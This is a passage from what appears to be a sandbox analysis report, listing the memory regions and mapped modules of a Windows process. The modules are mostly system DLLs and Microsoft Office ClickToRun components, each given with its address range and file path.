"\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 4066 start_va = 0x100000 end_va = 0x100fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 4067 start_va = 0x110000 end_va = 0x111fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 4068 start_va = 0x7fefa5c0000 end_va = 0x7fefa8c3fff monitored = 0 entry_point = 0x7fefa666094 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll") Region: id = 4071 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 4072 start_va = 0x120000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 4073 start_va = 0x7fefa140000 end_va = 0x7fefa5b7fff monitored = 0 entry_point = 0x7fefa1b9154 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll") Region: id = 4075 start_va = 0x330000 end_va = 0x331fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 4076 start_va = 0x7fef9850000 end_va = 0x7fefa13afff monitored = 0 entry_point = 0x7fef9955a48 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\mso40uiwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll") Region: id = 4078 start_va = 0x350000 end_va = 0x351fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 4079 start_va = 0x7fefbe90000 end_va = 0x7fefc0a4fff monitored = 0 entry_point = 0x7fefc0664b0 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 4080 start_va = 0xb40000 end_va = 0xbbcfff monitored = 0 entry_point = 0xb4cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 4081 start_va = 0xb40000 end_va = 0xbbcfff monitored = 0 entry_point = 0xb4cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 4082 start_va = 0x7fefd7b0000 end_va = 0x7fefd7befff monitored = 0 entry_point = 0x7fefd7b1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4083 start_va = 0xc60000 end_va = 0xd5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 4084 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 4085 start_va = 0x7fef9530000 end_va = 0x7fef9845fff monitored = 0 entry_point = 0x7fef9533e98 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 4086 start_va = 0x7fefe280000 end_va = 0x7feff007fff monitored = 0 entry_point = 0x7fefe2fcebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4087 start_va = 0x360000 end_va = 0x360fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 4088 start_va = 0xdf0000 end_va = 0xeeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 4089 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 4090 start_va = 0x7fefd8c0000 end_va = 0x7fefd8cefff monitored = 0 entry_point = 0x7fefd8c19b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4091 start_va = 0x7fefd460000 end_va = 0x7fefd46afff monitored = 0 entry_point = 0x7fefd461030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 4092 start_va = 0x7fefd780000 end_va = 0x7fefd7a4fff monitored = 0 entry_point = 0x7fefd789658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4093 start_va = 0xb40000 end_va = 0xc3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 4094 start_va = 0x370000 end_va = 0x370fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 4095 start_va = 0x1050000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 4096 start_va = 0x7feffbe0000 end_va = 0x7feffc78fff monitored = 0 entry_point = 0x7feffbe1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4097 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 4098 start_va = 0x380000 end_va = 0x380fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 4099 start_va = 0x7fef94b0000 end_va = 0x7fef9523fff monitored = 0 entry_point = 0x7fef94b66f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 4100 start_va = 0x7fefb690000 end_va = 0x7fefb6a4fff monitored = 0 entry_point = 0x7fefb6960d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 4101 start_va = 0xef0000 end_va = 0xfdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 4102 start_va = 0x1150000 end_va = 0x124ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 4103 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c7fff monitored = 0 entry_point = 0x7fefd1b3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4104 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 4105 start_va = 0xd60000 end_va = 0xda4fff monitored = 0 entry_point = 0xd61064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4106 start_va = 0xd60000 end_va = 0xda4fff monitored = 0 entry_point = 0xd61064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4107 start_va = 0xd60000 end_va = 0xda4fff monitored = 0 entry_point = 0xd61064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4108 start_va = 0xd60000 end_va = 0xda4fff monitored = 0 entry_point = 0xd61064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4109 start_va = 0xd60000 end_va = 0xda4fff monitored = 0 entry_point = 0xd61064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4110 start_va = 0x7fefceb0000 end_va = 0x7fefcef6fff monitored = 0 entry_point = 0x7fefceb1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4111 start_va = 0x7fefd860000 end_va = 0x7fefd873fff monitored = 0 entry_point = 0x7fefd8610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 4112 start_va = 0x12d0000 end_va = 0x13cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 4113 start_va = 0x13f0000 end_va = 0x14effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 4114 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 4115 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 4116 start_va = 0x7fef93c0000 end_va = 0x7fef94a1fff monitored = 0 entry_point = 0x7fef943d90c region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 4117 start_va = 0x7fefd880000 end_va = 0x7fefd8bcfff monitored = 0 entry_point = 0x7fefd8818f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4118 start_va = 0x7fef9310000 end_va = 0x7fef93b6fff monitored = 0 entry_point = 0x7fef932050c region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 4119 start_va = 0x7fefca80000 end_va = 0x7fefca8bfff monitored = 0 entry_point = 0x7fefca81064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4120 start_va = 0x7fefbca0000 end_va = 0x7fefbcb7fff monitored = 0 entry_point = 0x7fefbca1130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 4121 start_va = 0x7fef9000000 end_va = 0x7fef9307fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\mso40uires.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll") Region: id = 4124 start_va = 0x14f0000 end_va = 0x167ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014f0000" filename = "" Region: id = 4132 start_va = 0x14f0000 end_va = 0x15effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014f0000" filename = "" Region: id = 4133 start_va = 0x1670000 end_va = 0x167ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001670000" filename = "" Region: id = 4134 start_va = 0x1790000 end_va = 0x188ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001790000" filename = "" Region: id = 4135 start_va = 0x1980000 end_va = 0x1a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001980000" filename = "" Region: id = 4136 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 4137 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 4148 start_va = 0x1a80000 end_va = 0x1b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a80000" filename = "" Region: id = 4149 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 4151 start_va = 0x1ca0000 end_va = 0x1d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 4152 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 4153 start_va = 0x7fef8e60000 end_va = 0x7fef8f64fff monitored = 0 entry_point = 0x7fef8e6dae8 region_type = mapped_file name = "streamserver.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\StreamServer.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\streamserver.dll") Region: id = 4164 start_va = 0x7fef8d40000 end_va = 0x7fef8db0fff monitored = 0 entry_point = 0x7fef8d9e844 region_type = mapped_file name = "msdelta.dll" filename = "\\Windows\\System32\\msdelta.dll" (normalized: "c:\\windows\\system32\\msdelta.dll") Region: id = 4191 start_va = 0x1680000 end_va = 0x1780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001680000" filename = "" Region: id = 4192 start_va = 0x1da0000 end_va = 0x1fa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 4213 start_va = 0xc40000 end_va = 0xc40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4214 start_va = 0xc50000 end_va = 0xc56fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4215 start_va = 0xc40000 end_va = 0xc40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4216 start_va = 0xc50000 end_va = 0xc56fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4234 start_va = 0x7fefcd80000 end_va = 0x7fefcd89fff monitored = 0 entry_point = 0x7fefcd83cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 4237 start_va = 0x7fef8760000 end_va = 0x7fef87d4fff monitored = 0 entry_point = 0x7fef878d4f0 region_type = mapped_file name = "appvisvapi.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppVIsvApi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll") Region: id = 4241 start_va = 0xc40000 end_va = 0xc40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 4242 start_va = 0x7fef8620000 end_va = 0x7fef875efff monitored = 0 entry_point = 0x7fef86805e4 region_type = mapped_file name = "appvpolicy.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppVPolicy.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll") Region: id = 4261 start_va = 0xc50000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c50000" filename = "" Region: id = 4263 start_va = 0x7fef8570000 end_va = 0x7fef8615fff monitored = 0 entry_point = 0x7fef85befec region_type = mapped_file name = "msvcp120.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\msvcp120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp120.dll") Region: id = 4282 start_va = 0x7fef83a0000 end_va = 0x7fef848efff monitored = 0 entry_point = 0x7fef83c29cc region_type = mapped_file name = "msvcr120.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\msvcr120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcr120.dll") Region: id = 4303 start_va = 0x7fefcc70000 end_va = 0x7fefcc8dfff monitored = 0 entry_point = 0x7fefcc713b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4304 start_va = 0x7fefb9d0000 end_va = 0x7fefb9e5fff monitored = 0 entry_point = 0x7fefb9d11a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 4305 start_va = 0x7fefb9c0000 end_va = 0x7fefb9cbfff monitored = 0 entry_point = 0x7fefb9c18a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4306 start_va = 0x7fefd290000 end_va = 0x7fefd2b2fff monitored = 0 entry_point = 0x7fefd291198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 4307 start_va = 0x7fefb9a0000 end_va = 0x7fefb9b4fff monitored = 0 entry_point = 0x7fefb9a1050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4308 start_va = 0x7fefb980000 end_va = 0x7fefb993fff monitored = 0 entry_point = 0x7fefb9816b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4382 start_va = 0x77b40000 end_va = 0x77b42fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 4383 start_va = 0x7fef8b70000 end_va = 0x7fef8be0fff monitored = 0 entry_point = 0x7fef8b71010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4384 start_va = 0x7fef8a70000 end_va = 0x7fef8ad3fff monitored = 0 entry_point = 0x7fef8a71254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 4385 start_va = 0x7fefb140000 end_va = 0x7fefb150fff monitored = 0 entry_point = 0x7fefb1416ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4386 start_va = 0x7fefb0c0000 end_va = 0x7fefb0d7fff monitored = 0 entry_point = 0x7fefb0c1bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4387 start_va = 0xef0000 end_va = 0xfaffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4388 start_va = 0xfd0000 end_va = 0xfdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 4392 start_va = 0x7fef7e40000 end_va = 0x7fef7f29fff monitored = 0 entry_point = 0x7fef7eaca10 region_type = mapped_file name = "appvorchestration.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppVOrchestration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll") Region: id = 4394 start_va = 0xd60000 end_va = 0xd60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 4395 start_va = 0x2060000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 4396 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 4397 start_va = 0x2310000 end_va = 0x240ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002310000" filename = "" Region: id = 4398 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 4399 start_va = 0x7fef7e00000 end_va = 0x7fef7e35fff monitored = 0 entry_point = 0x7fef7e0daa0 region_type = mapped_file name = "appvisvstreamingmanager.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll") Region: id = 4408 start_va = 0xd70000 end_va = 0xd70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d70000" filename = "" Region: id = 4409 start_va = 0x7fef7c60000 end_va = 0x7fef7d8efff monitored = 0 entry_point = 0x7fef7cbf2a4 region_type = mapped_file name = "appvmanifest.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppVManifest.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll") Region: id = 4411 start_va = 0xd80000 end_va = 0xd80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 4419 start_va = 0x2410000 end_va = 0x260ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 4434 start_va = 0x7fefc290000 end_va = 0x7fefc2bbfff monitored = 0 entry_point = 0x7fefc2915c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4480 start_va = 0x7fef7b40000 end_va = 0x7fef7be1fff monitored = 0 entry_point = 0x7fef7b8988c region_type = mapped_file name = "appvcatalog.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppVCatalog.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll") Region: id = 4503 start_va = 0xd90000 end_va = 0xd90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d90000" filename = "" Region: id = 4506 start_va = 0x7fef7a50000 end_va = 0x7fef7adcfff monitored = 0 entry_point = 0x7fef7a90cc4 region_type = mapped_file name = "appvisvvirtualization.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll") Region: id = 4530 start_va = 0xda0000 end_va = 0xda0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000da0000" filename = "" Region: id = 4531 start_va = 0x77b30000 end_va = 0x77b36fff monitored = 0 entry_point = 0x77b3106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 4612 start_va = 0x7fef7460000 end_va = 0x7fef7669fff monitored = 0 entry_point = 0x7fef755b0a0 region_type = mapped_file name = "appvintegration.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll") Region: id = 4618 start_va = 0xdb0000 end_va = 0xdb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000db0000" filename = "" Region: id = 4741 start_va = 0x7fef7350000 end_va = 0x7fef735bfff monitored = 0 entry_point = 0x7fef735602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4753 start_va = 0x7fef71a0000 end_va = 0x7fef72f9fff monitored = 0 entry_point = 0x7fef725565c region_type = mapped_file name = "appvisvsubsystemcontroller.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll") Region: id = 4772 start_va = 0xdc0000 end_va = 0xdc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dc0000" filename = "" Region: id = 4788 start_va = 0x7fef7150000 end_va = 0x7fef719cfff monitored = 0 entry_point = 0x7fef716792c region_type = mapped_file name = "appvfilesystemmetadata.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppVFileSystemMetadata.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll") Region: id = 4796 start_va = 0xdd0000 end_va = 0xdd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dd0000" filename = "" Region: id = 4833 start_va = 0x26a0000 end_va = 0x279ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 4834 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 4842 start_va = 0x2810000 end_va = 0x290ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002810000" filename = "" Region: id = 4843 start_va = 0x2a00000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 4844 start_va = 0x2b90000 end_va = 0x2c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b90000" filename = "" Region: id = 4845 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 4846 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 4847 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 4848 start_va = 0x21b0000 end_va = 0x22affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 4849 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 4850 start_va = 0x2f70000 end_va = 0x306ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f70000" filename = "" Region: id = 4851 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 4852 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 4853 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 4854 start_va = 0x13fb40000 end_va = 0x13fc4cfff monitored = 0 entry_point = 0x13fb49d20 region_type = mapped_file name = "integratedoffice.exe" filename = "\\Program Files\\Microsoft Office 15\\ClientX64\\IntegratedOffice.exe" (normalized: "c:\\program files\\microsoft office 15\\clientx64\\integratedoffice.exe") Region: id = 4855 start_va = 0x13f5e0000 end_va = 0x13f6ecfff monitored = 0 entry_point = 0x13f5e9d20 region_type = mapped_file name = "integratedoffice.exe" filename = "\\Program Files\\Microsoft Office 15\\ClientX64\\IntegratedOffice.exe" (normalized: "c:\\program files\\microsoft office 15\\clientx64\\integratedoffice.exe") Region: id = 4856 start_va = 0x13f370000 end_va = 0x13f47cfff monitored = 0 entry_point = 0x13f379d20 region_type = mapped_file name = "officeclicktorun.exe" filename = "\\Program Files\\Microsoft Office 15\\ClientX64\\OfficeClickToRun.exe" (normalized: "c:\\program files\\microsoft office 15\\clientx64\\officeclicktorun.exe") Region: id = 4857 start_va = 0x13f4d0000 end_va = 0x13f5dcfff monitored = 0 entry_point = 0x13f4d9d20 region_type = mapped_file name = "officeclicktorun.exe" filename = "\\Program Files\\Microsoft Office 15\\ClientX64\\OfficeClickToRun.exe" (normalized: "c:\\program 